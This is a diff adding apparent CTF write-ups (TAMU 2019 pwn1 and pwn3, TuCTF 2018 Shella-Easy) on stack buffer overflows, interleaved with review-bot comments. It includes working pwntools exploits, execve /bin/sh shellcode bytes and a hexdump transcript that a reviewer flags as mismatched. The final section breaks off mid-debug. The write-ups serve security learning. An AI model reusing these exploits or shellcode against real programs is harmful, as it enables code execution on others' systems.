+
+ {
+ FILE *__fp;
+ int iVar1;
+
+ puts("Right. Off you go.");
+ __fp = fopen("flag.txt","r");
+ while( true ) {
+ iVar1 = _IO_getc((_IO_FILE *)__fp);
+ if ((char)iVar1 == -1) break;
+ putchar((int)(char)iVar1);
+ }
+ putchar(10);
+ return;
+ }
+
+
+what we need to do here basically is that we have to use the gets call to overwrite the contents of local_18 to become 0xdea110c8 in order to get the flag.txt. Now looking at the following assembly code:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main(undefined1 param_1)
+ undefined AL:1
+ undefined1 Stack[0x4]:1 param_1 XREF[1]: 00010779(*)
+ undefined4 Stack[0x0]:4 local_res0 XREF[1]: 00010780(R)
+ undefined1 Stack[-0x10]:1 local_10 XREF[1]: 000108d9(*)
+ undefined4 Stack[-0x14]:4 local_14 XREF[1]: 000107ad(W)
+ undefined4 Stack[-0x18]:4 local_18 XREF[2]: 000107b4(W),
+ 000108b2(R)
+ undefined1 Stack[-0x43]:1 local_43 XREF[5]: 000107ed(*),
+ 00010803(*),
+ 0001084f(*),
+ 00010865(*),
+ 000108a6(*)
+ main XREF[5]: Entry Point(*),
+ _start:000105e6(*), 00010ab8,
+ 00010b4c(*), 00011ff8(*)
+ 00010779 8d 4c 24 04 LEA ECX=>param_1,[ESP + 0x4]
+
+
+
+we see that our input (local_43) starts at offset -0x43. we also see that local_18 starts at offset -0x18. so we need to take into account the following offset: **0x43 - 0x18 = 0x2b** between the start of our input and local_18. Then we will be able to overflow it and overwrite local_18 with 0xdea110c8 so let's write the python exploit:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ls -lash
+ total 20K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Feb 23 13:35 .
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Feb 23 13:16 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 18 Feb 23 13:35 flag.txt
+ 8.0K -rwxr-xr-x 1 nothing nothing 7.4K Feb 23 13:16 pwn1
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./pwn1')
+
+ payload = b""
+ payload += b"0"*0x2b
+ payload += p32(0xdea110c8)
+
+ target.sendline("Sir Lancelot of Camelot")
+ target.sendline("To seek the Holy Grail.")
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+So first we create the payload ( 2b zeroes for the initial padding and then with the little endian value 0xdea110c8). After the payload is created, we send the 2 strings of text the binary wants to get past the first 2 questions, and then we send the payload. After that we get into an interactive shell to see what the result is:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → vim exploit.py
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → python3 exploit.py
+ [+] Starting local process './pwn1': pid 34429
+ [*] Switching to interactive mode
+ [*] Process './pwn1' stopped with exit code 0 (pid 34429)
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ What... is your quest?
+ What... is my secret?
+ Right. Off you go.
+ flag{g0ttem_b0yz}
+
+ [*] Got EOF while reading in interactive
+ $ :-)
+
+
+
+And that's it! We have been able to print out the flag thanks to our buffer overflow payload.
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
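Review bot: the jump from `if (local_18 == -0x215eef38)` in the decompiler output to the `0xdea110c8` used in the payload is never explained; add one sentence stating that these are the same 32-bit value (Ghidra prints the signed interpretation, and `0x100000000 - 0x215eef38 = 0xdea110c8`, which matches the `CMP dword ptr [EBP + local_18],0xdea110c8` disassembly), otherwise a reader cannot see why `p32(0xdea110c8)` is the right constant. It would also help to say why only the third prompt is exploitable: `fgets(local_43,0x2b,stdin)` reads at most 0x2a characters into a 43-byte buffer, so the first two answers cannot reach `local_18`, whereas `gets(local_43)` has no bound. In exploit.py the payload is built as bytes (`payload = b""`) but the two answers are sent as str via `target.sendline("Sir Lancelot of Camelot")`; use `b"..."` for both so the script does not rely on pwntools' implicit str-to-bytes conversion. Style: the `→ vim exploit.py` prompt appears twice (before the listing and again at the top of the run transcript), the lone `![]()` after the closing paragraph has no image path, and the two trailing `## Title` / `text` sections are unfilled template stubs; tidy these before merge.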
diff --git a/2/pwn3.md b/2/pwn3.md
new file mode 100644
index 0000000..04f0f9b
--- /dev/null
+++ b/2/pwn3.md
@@ -0,0 +1,340 @@
+# TAMU 2019 Pwn3
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3
+ --2021-03-05 12:37:20-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3 [following]
+ --2021-03-05 12:37:20-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tamu19_pwn3/pwn3
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7348 (7.2K) [application/octet-stream]
+ Saving to: ‘pwn3’
+
+ pwn3 100%[============================================================================================================================================================================>] 7.18K --.-KB/s in 0.001s
+
+ 2021-03-05 12:37:21 (12.1 MB/s) - ‘pwn3’ saved [7348/7348]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → file pwn3
+ pwn3: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6ea573b4a0896b428db719747b139e6458d440a0, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → chmod +x pwn3
+
+
+
+
+` ![]()
+
+## Solution
+
+First let's execute the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → ./pwn3
+ Take this, you might need it on your journey 0xfff0aa1e!
+ thanks!
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → ./pwn3
+ Take this, you might need it on your journey 0xffa9ce0e!
+ No Thanks!
+
+
+
+Here we see the binary giving us some text output with a certain memory address, and then prompts us for our text and depending on that text, we might get an answer or not. Now let's view it inside of ghidra:
+
+
+
+We get the following code:
+
+
+ undefined4 main(void)
+
+ {
+ undefined *puVar1;
+
+ puVar1 = &stack0x00000004;
+ setvbuf(stdout,(char *)0x2,0,0);
+ echo(puVar1);
+ return 0;
+ }
+
+
+Here we see that the important part of the main function is the echo function:
+
+
+ /* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
+
+ void echo(void)
+
+ {
+ char local_12e [294];
+
+ printf("Take this, you might need it on your journey %p!\n",local_12e);
+ gets(local_12e);
+ return;
+ }
+
+
+
+Here we see our input text gets passed into local_12e, and the function prints the address of the char buffer of local_12e. The bug here is that the gets function that is being used to process our input does not have a limit, it won't restrict us no matter how much data we feed through it, so we have an overflow right here. The question is what do we call ? There are not any function that print the flag nor give a shell, This is why we need to feed shellcode in.
+
+Now in the previous challenge we were able to create the shellcode we needed for the x86_64 architecture. However this time we need to take into account that this is a 32 bit binary, we have to follow the x86 architecture as we create our shellcode. For this example we're going to grab some shellcode from [shell-storm.org](http://shell-storm.org/shellcode/files/shellcode-827.php).
+
+Now let's use gdb to see how much space we have between the start of our input and the return address:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/pwn3]
+ → gdb ./pwn3
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./pwn3...
+ (No debugging symbols found in ./pwn3)
+ gef➤ disas echo
+ Dump of assembler code for function echo:
+ 0x0000059d <+0>: push ebp
+ 0x0000059e <+1>: mov ebp,esp
+ 0x000005a0 <+3>: push ebx
+ 0x000005a1 <+4>: sub esp,0x134
+ 0x000005a7 <+10>: call 0x4a0 <__x86.get_pc_thunk.bx>
+ 0x000005ac <+15>: add ebx,0x1a20
+ 0x000005b2 <+21>: sub esp,0x8
+ 0x000005b5 <+24>: lea eax,[ebp-0x12a]
+ 0x000005bb <+30>: push eax
+ 0x000005bc <+31>: lea eax,[ebx-0x191c]
+ 0x000005c2 <+37>: push eax
+ 0x000005c3 <+38>: call 0x410
+ 0x000005c8 <+43>: add esp,0x10
+ 0x000005cb <+46>: sub esp,0xc
+ 0x000005ce <+49>: lea eax,[ebp-0x12a]
+ 0x000005d4 <+55>: push eax
+ 0x000005d5 <+56>: call 0x420
+ 0x000005da <+61>: add esp,0x10
+ 0x000005dd <+64>: nop
+ 0x000005de <+65>: mov ebx,DWORD PTR [ebp-0x4]
+ 0x000005e1 <+68>: leave
+ 0x000005e2 <+69>: ret
+ End of assembler dump.
+
+
+
+Now as we disassembled the echo function, we set a breakpoint +61 because this is right after the gets call where we insert our text in.
+
+
+ gef➤ b *echo+61
+ Breakpoint 1 at 0x5da
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/pwn3/pwn3
+ Take this, you might need it on your journey 0xffffcfbe!
+ 13371337
+
+ Breakpoint 1, 0x565555da in echo ()
+ ~/.gef-54e93efd89ec59e5d178fbbeda1fed890098d18d.py:2425: DeprecationWarning: invalid escape sequence '\
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xffffcfbe → "13371337"
+ $ebx : 0x56556fcc → 0x00001ed4
+ $ecx : 0xf7f90540 → 0xfbad2288
+ $edx : 0xfbad2288
+ $esp : 0xffffcfa0 → 0xffffcfbe → "13371337"
+ $ebp : 0xffffd0e8 → 0xffffd0f8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x56555460 → <_start+0> xor ebp, ebp
+ $eip : 0x565555da → add esp, 0x10
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffcfa0│+0x0000: 0xffffcfbe → "13371337" ← $esp
+ 0xffffcfa4│+0x0004: 0xffffcfbe → "13371337"
+ 0xffffcfa8│+0x0008: 0xffffcfff → 0xffd08000
+ 0xffffcfac│+0x000c: 0x565555ac → add ebx, 0x1a20
+ 0xffffcfb0│+0x0010: 0x00000000
+ 0xffffcfb4│+0x0014: 0x00000000
+ 0xffffcfb8│+0x0018: 0x00000000
+ 0xffffcfbc│+0x001c: 0x3331b6ff
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x565555ce lea eax, [ebp-0x12a]
+ 0x565555d4 push eax
+ 0x565555d5 call 0x56555420
+ → 0x565555da add esp, 0x10
+ 0x565555dd nop
+ 0x565555de mov ebx, DWORD PTR [ebp-0x4]
+ 0x565555e1 leave
+ 0x565555e2 ret
+ 0x565555e3 lea ecx, [esp+0x4]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "pwn3", stopped 0x565555da in echo (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x565555da → echo()
+ [#1] 0x5655561a → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ search-pattern 13371337
+
+
+
+Now that we set the breakpoint, we run the binary, and put in an easy-to remember pattern (13371337) and then we search for that pattern in the memory:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[heap]'(0x56558000-0x5657a000), permission=rw-
+ 0x565581a0 - 0x565581aa → "13371337\n"
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
+ 0xffffcfbe - 0xffffcfc6 → "13371337"
+
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0f0:
+ eip = 0x565555da in echo; saved eip = 0x5655561a
+ called by frame at 0xffffd110
+ Arglist at 0xffffd0e8, args:
+ Locals at 0xffffd0e8, Previous frame's sp is 0xffffd0f0
+ Saved registers:
+ ebx at 0xffffd0e4, ebp at 0xffffd0e8, eip at 0xffffd0ec
+
+
+
+Here we see that the important addresses are **0xffffd0ec** and **0xffffcfbe**. So let's calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/pwn3]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0xffffd0ec)
+ '0xffffd0ec'
+ >>> hex(0xffffd0ec - 0xffffcfbe)
+ '0x12e'
+
+
+
+And we see that we have an offset of 0x12e bytes between the start of our input (0xffffcfbe) and the return address (0xffffd0ec). This makes sense because our input value (local_12e) is 294 bytes large,there are 2 saved register values (ebx and ebp) on the stack in between our input and the saved return address which are each 4 bytes a piece (294 + 4 +4 = 0x12e). So with this we can construct our payload :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/12 ] [binexp/2/pwn3]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./pwn3')
+
+ #print the text, up to the address of the start of the input
+ print(target.recvuntil("journey "))
+
+ #Scan the rest of the line
+ leak = target.recvline()
+
+ Adr = int(leak.strip(b"!\n"),16)
+
+ shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+ payload = b""
+ payload += shellcode
+ payload += b"\x00" * (0x12e - len(payload))
+ payload += p32(Adr)
+
+ print(hexdump(payload))
+
+
+
+The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+Now let's check out our payload:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/13 ] [binexp/2/pwn3]
+ → python3 exploit.py
+ [+] Starting local process './pwn3': pid 218489
+ b'Take this, you might need it on your journey '
+ 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 │1·Ph│//sh│h/bi│n··P│
+ 00000010 53 89 e1 b0 0b cd 80 00 00 00 00 00 00 00 00 00 │S···│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe d4 │····│····│····│····│
+ 00000130 94 ff │··│
+ 00000132
+
+
+
+Now let's use the following 2 lines to feed our payload into the binary:
+
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/13 ] [binexp/2/pwn3]
+ → python3 exploit.py
+ [+] Starting local process './pwn3': pid 524665
+ b'Take this, you might need it on your journey '
+ 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 dc 50 │1·Ph│//sh│h/bi│n··P│
+ 00000010 53 89 cc b0 0b cd 80 00 00 00 00 00 00 00 00 00 │S···│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 27 │····│····│····│···'│
+ 00000130 d7 ff │··│
+ 00000132
+ [*] Switching to interactive mode
+ [*] Got EOF while reading in interactive
+ $cat flag.txt
+ flag{g0ttem_b0yz}
+ $ exit
+ [*] Got EOF while reading in interactive
+ $ exit
+ [*] Process './pwn3' stopped with exit code 0 (pid 524665)
+ [*] Got EOF while sending in interactive
+
+
+
+
+And that's it! We have been able to print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
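Review bot: the second run's hexdump (`00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 dc 50` and `00000010 53 89 cc b0 0b cd 80 ...`) does not match the shellcode exploit.py builds, which has `\x89\xe3` and `\x89\xe1` and which the first hexdump correctly shows as `89 e3 50` / `53 89 e1`; the transcript looks hand-edited or captured from a different script, so regenerate it so the bytes agree with the code. The offset explanation also needs a fix: "294 bytes large,there are 2 saved register values" is missing a space, and the arithmetic is clearer in one base, e.g. 294 + 4 + 4 = 302 = 0x12e. Finally, the two trailing `## Title` / `text` / `` ` ![]() `` sections are unfilled template blocks and should be removed before merge.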
diff --git a/2/shella.md b/2/shella.md
new file mode 100644
index 0000000..fdcf471
--- /dev/null
+++ b/2/shella.md
@@ -0,0 +1,387 @@
+# TuCTF 2018 Shella-Easy
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy
+ --2021-03-05 17:20:57-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy [following]
+ --2021-03-05 17:20:57-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/tu18_shellaeasy/shella-easy
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7404 (7.2K) [application/octet-stream]
+ Saving to: ‘shella-easy’
+
+ shella-easy 100%[============================================================================================================================================================================>] 7.23K --.-KB/s in 0s
+
+ 2021-03-05 17:20:57 (20.9 MB/s) - ‘shella-easy’ saved [7404/7404]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → file shella-easy
+ shella-easy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=38de2077277362023aadd2209673b21577463b66, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → chmod +X shella-easy
+
+
+
+` ![]()
+
+## Solution
+
+First let's run the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → ./shella-easy
+ Yeah I'll have a 0xffa70630 with a side of fries thanks
+ yes
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → ./shella-easy
+ Yeah I'll have a 0xff94b1a0 with a side of fries thanks
+ no
+
+
+
+Very similar to the previous challenge we did, the binary prints out some text with a memory address, and then asks us for some text input. Let's see what we can find in ghidra:
+
+
+
+Which gives us the following code:
+
+
+ undefined4 main(void)
+
+ {
+ char local_4c [64];
+ int local_c;
+
+ setvbuf(stdout,(char *)0x0,2,0x14);
+ setvbuf(stdin,(char *)0x0,2,0x14);
+ local_c = -0x35014542;
+ printf("Yeah I\'ll have a %p with a side of fries thanks\n",local_4c);
+ gets(local_4c);
+ if (local_c != -0x21524111) {
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ return 0;
+ }
+
+
+
+Here we see that our input text gets stored into the variable local_4c and gets passed through a gets() function, and we know that the gets call does not restrict user input, therefore we know we can do a buffer overflow thanks to it. The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+However, according to the decompiled code, the function exit is called, when this function is called, the ret instruction will not run in the context of this function, so we won't get code execution. So let's look at the assembly :
+
+
+
+
+ 08048539 e8 52 fe CALL gets char * gets(char * __s)
+ ff ff
+ 0804853e 83 c4 04 ADD ESP,0x4
+ 08048541 81 7d f8 CMP dword ptr [EBP + local_c],0xdeadbeef
+ ef be ad de
+ 08048548 74 07 JZ LAB_08048551
+ 0804854a 6a 00 PUSH 0x0
+ 0804854c e8 4f fe CALL exit void exit(int __status)
+ ff ff
+ -- Flow Override: CALL_RETURN (CALL_TERMINATOR)
+ LAB_08048551 XREF[1]: 08048548(j)
+ 08048551 b8 00 00 MOV EAX,0x0
+ 00 00
+ 08048556 8b 5d fc MOV EBX,dword ptr [EBP + local_8]
+ 08048559 c9 LEAVE
+ 0804855a c3 RET
+
+
+
+Here we see that there is a check to see if the variable local_c is equal to 0xdeadbeef, and if it is, the function doesn't call exit(0), and we end up with our code execution. Now let's take a look at the stack layout in ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined4 Stack[-0x8]:4 local_8 XREF[1]: 08048556(R)
+ undefined4 Stack[-0xc]:4 local_c XREF[2]: 0804851b(W),
+ 08048541(R)
+ undefined1 Stack[-0x4c]:1 local_4c XREF[2]: 08048522(*),
+ 08048535(*)
+ main XREF[4]: Entry Point(*),
+ _start:080483f7(*), 08048630,
+ 080486a0(*)
+ 080484db 55 PUSH EBP
+
+
+
+We see that the local_c variable is within range of our overflowing variable (local_4c) where we put our text in. So, now that we know that, we need to find out what the offset is between the memory address of our input and the memory address of the return address, to do so we use gdb:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → gdb ./shella-easy
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./shella-easy...
+ (No debugging symbols found in ./shella-easy)
+ gef➤ disas main
+ Dump of assembler code for function main:
+ 0x080484db <+0>: push ebp
+ 0x080484dc <+1>: mov ebp,esp
+ 0x080484de <+3>: push ebx
+ 0x080484df <+4>: sub esp,0x44
+ 0x080484e2 <+7>: call 0x8048410 <__x86.get_pc_thunk.bx>
+ 0x080484e7 <+12>: add ebx,0x1b19
+ 0x080484ed <+18>: mov eax,DWORD PTR [ebx-0x4]
+ 0x080484f3 <+24>: mov eax,DWORD PTR [eax]
+ 0x080484f5 <+26>: push 0x14
+ 0x080484f7 <+28>: push 0x2
+ 0x080484f9 <+30>: push 0x0
+ 0x080484fb <+32>: push eax
+ 0x080484fc <+33>: call 0x80483c0
+ 0x08048501 <+38>: add esp,0x10
+ 0x08048504 <+41>: mov eax,DWORD PTR [ebx-0x8]
+ 0x0804850a <+47>: mov eax,DWORD PTR [eax]
+ 0x0804850c <+49>: push 0x14
+ 0x0804850e <+51>: push 0x2
+ 0x08048510 <+53>: push 0x0
+ 0x08048512 <+55>: push eax
+ 0x08048513 <+56>: call 0x80483c0
+ 0x08048518 <+61>: add esp,0x10
+ 0x0804851b <+64>: mov DWORD PTR [ebp-0x8],0xcafebabe
+ 0x08048522 <+71>: lea eax,[ebp-0x48]
+ 0x08048525 <+74>: push eax
+ 0x08048526 <+75>: lea eax,[ebx-0x1a20]
+ 0x0804852c <+81>: push eax
+ 0x0804852d <+82>: call 0x8048380
+ 0x08048532 <+87>: add esp,0x8
+ 0x08048535 <+90>: lea eax,[ebp-0x48]
+ 0x08048538 <+93>: push eax
+ 0x08048539 <+94>: call 0x8048390
+ 0x0804853e <+99>: add esp,0x4
+ 0x08048541 <+102>: cmp DWORD PTR [ebp-0x8],0xdeadbeef
+ 0x08048548 <+109>: je 0x8048551
+ 0x0804854a <+111>: push 0x0
+ 0x0804854c <+113>: call 0x80483a0
+ 0x08048551 <+118>: mov eax,0x0
+ 0x08048556 <+123>: mov ebx,DWORD PTR [ebp-0x4]
+ 0x08048559 <+126>: leave
+ 0x0804855a <+127>: ret
+ End of assembler dump.
+
+
+
+Here we want to set a breakpoint after the gets call at +99:
+
+
+ gef➤ b *main+99
+ Breakpoint 1 at 0x804853e
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/shella/shella-easy
+ Yeah I'll have a 0xffffd0a0 with a side of fries thanks
+ 13371337
+
+ Breakpoint 1, 0x0804853e in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xffffd0a0 → "13371337"
+ $ebx : 0x0804a000 → 0x08049f0c → 0x00000001
+ $ecx : 0xf7f90540 → 0xfbad208b
+ $edx : 0xfbad208b
+ $esp : 0xffffd09c → 0xffffd0a0 → "13371337"
+ $ebp : 0xffffd0e8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x080483e0 → <_start+0> xor ebp, ebp
+ $eip : 0x0804853e → add esp, 0x4
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd09c│+0x0000: 0xffffd0a0 → "13371337" ← $esp
+ 0xffffd0a0│+0x0004: "13371337"
+ 0xffffd0a4│+0x0008: "1337"
+ 0xffffd0a8│+0x000c: 0x00000000
+ 0xffffd0ac│+0x0010: 0xf7dd8b82 → <__internal_atexit+66> add esp, 0x10
+ 0xffffd0b0│+0x0014: 0xf7f903bc → 0xf7f919e0 → 0x00000000
+ 0xffffd0b4│+0x0018: 0xffffffff
+ 0xffffd0b8│+0x001c: 0x080483e0 → <_start+0> xor ebp, ebp
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x8048535 lea eax, [ebp-0x48]
+ 0x8048538 push eax
+ 0x8048539 call 0x8048390
+ → 0x804853e add esp, 0x4
+ 0x8048541 cmp DWORD PTR [ebp-0x8], 0xdeadbeef
+ 0x8048548 je 0x8048551
+ 0x804854a push 0x0
+ 0x804854c call 0x80483a0
+ 0x8048551 mov eax, 0x0
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "shella-easy", stopped 0x804853e in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x804853e → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+After setting the breakpoint, we ran the binary, and then we passed a pattern that is easy to remember (13371337).Now that we hit our breakpoint, we want to know where is our pattern located:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
+ 0xffffd0a0 - 0xffffd0a8 → "13371337"
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0f0:
+ eip = 0x804853e in main; saved eip = 0xf7dbfa0d
+ Arglist at 0xffffd0e8, args:
+ Locals at 0xffffd0e8, Previous frame's sp is 0xffffd0f0
+ Saved registers:
